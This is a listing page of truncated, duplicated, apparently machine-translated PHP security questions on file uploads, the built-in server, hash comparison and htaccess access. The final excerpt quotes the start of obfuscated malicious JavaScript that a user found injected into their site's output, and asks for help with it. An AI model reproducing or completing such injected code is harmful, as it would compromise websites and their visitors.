草庐IT

SECURITY

全部标签

php - 将上传的图像放在公共(public)文件夹中是否安全?

我刚刚和我的队友讨论了用户上传图片在图片库中的位置。我想更广泛地了解我们建议的方法。我的队友编写了一个Controller+操作,它调用file_get_contents放置在不可用于公共(public)浏览的文件夹中的图像文件(即,在服务器上的public_html之外),并通过标题回显它。这是安全的,但由于我们使用ZendFramework,它的爬行速度也很慢-由于执行Bootstrap的查询,每次调用图像Controller都会花费我们大约500毫秒的延迟。这很烦人,因为图片库View同时显示20多张图片。简而言之,相关代码是:classImageControllerextend

php - 将上传的图像放在公共(public)文件夹中是否安全?

我刚刚和我的队友讨论了用户上传图片在图片库中的位置。我想更广泛地了解我们建议的方法。我的队友编写了一个Controller+操作,它调用file_get_contents放置在不可用于公共(public)浏览的文件夹中的图像文件(即,在服务器上的public_html之外),并通过标题回显它。这是安全的,但由于我们使用ZendFramework,它的爬行速度也很慢-由于执行Bootstrap的查询,每次调用图像Controller都会花费我们大约500毫秒的延迟。这很烦人,因为图片库View同时显示20多张图片。简而言之,相关代码是:classImageControllerextend

php - 在生产中使用 PHP 内置服务器

我最近对​​PHP5.4的内置网络服务器感到好奇。从表面上看,虽然相当准系统,但通过足够的工作,可以将传统上依赖于单独Web服务器(如WordPress)的PHP应用程序分发为独立脚本,您可以使用php-S运行localhost:80app.php(或者更可能是'./wordpress.sh')。他们甚至可能会附带自己的PHP解释器,该解释器具有应用程序所需的所有功能,这样就无需针对该语言的许多不同版本。它在某种程度上是在重新发明轮子,但它肯定会增加最终用户的便携性并降低复杂性。然而,我在documentationpage上看到了以下内容:Thiswebserverwasdesigne

php - 在生产中使用 PHP 内置服务器

我最近对​​PHP5.4的内置网络服务器感到好奇。从表面上看,虽然相当准系统,但通过足够的工作,可以将传统上依赖于单独Web服务器(如WordPress)的PHP应用程序分发为独立脚本,您可以使用php-S运行localhost:80app.php(或者更可能是'./wordpress.sh')。他们甚至可能会附带自己的PHP解释器,该解释器具有应用程序所需的所有功能,这样就无需针对该语言的许多不同版本。它在某种程度上是在重新发明轮子,但它肯定会增加最终用户的便携性并降低复杂性。然而,我在documentationpage上看到了以下内容:Thiswebserverwasdesigne

php - strcmp vs. == vs. === 在 PHP 中用于检查散列相等性

我正在使用crypt()在PHP中对密码进行哈希处理,并试图在执行密码检查时找出最安全的方法来测试生成的哈希值是否相等。我可以看到三个选项:选项1-双等号functioncheckPassword($hash,$password){returncrypt($password,$hash)==$hash;}选项2-三重相等functioncheckPassword($hash,$password){returncrypt($password,$hash)===$hash;}选项3-strcmp()functioncheckPassword($hash,$password){returns

php - strcmp vs. == vs. === 在 PHP 中用于检查散列相等性

我正在使用crypt()在PHP中对密码进行哈希处理,并试图在执行密码检查时找出最安全的方法来测试生成的哈希值是否相等。我可以看到三个选项:选项1-双等号functioncheckPassword($hash,$password){returncrypt($password,$hash)==$hash;}选项2-三重相等functioncheckPassword($hash,$password){returncrypt($password,$hash)===$hash;}选项3-strcmp()functioncheckPassword($hash,$password){returns

php - 使用 file_get_contents 验证和访问受 htaccess 保护的文件

这个问题在这里已经有了答案:MakingaHTTPGETrequestwithHTTP-Basicauthentication(4个答案)关闭8年前。我需要访问受常规.htaccess文件(Auth类型Basic、htpasswords等...)保护的外部.php页面。我想通过请求发送所需的用户名和密码。可能吗?如果可能的话,我想避免cURL和所有pecl_http依赖函数...

php - 使用 file_get_contents 验证和访问受 htaccess 保护的文件

这个问题在这里已经有了答案:MakingaHTTPGETrequestwithHTTP-Basicauthentication(4个答案)关闭8年前。我需要访问受常规.htaccess文件(Auth类型Basic、htpasswords等...)保护的外部.php页面。我想通过请求发送所需的用户名和密码。可能吗?如果可能的话,我想避免cURL和所有pecl_http依赖函数...

PHP 脚本 : malicious JavaScript code at the end

问题:在我的网站空间中,有一些PHP文件都以此结尾:在这一行之前,文件中还有HTML代码。当然,浏览器中的输出以此结尾:但是昨天,最后突然出现了一些恶意代码。我的index.php的输出是:vari={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{varl=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74'

PHP 脚本 : malicious JavaScript code at the end

问题:在我的网站空间中,有一些PHP文件都以此结尾:在这一行之前,文件中还有HTML代码。当然,浏览器中的输出以此结尾:但是昨天,最后突然出现了一些恶意代码。我的index.php的输出是:vari={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{varl=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74'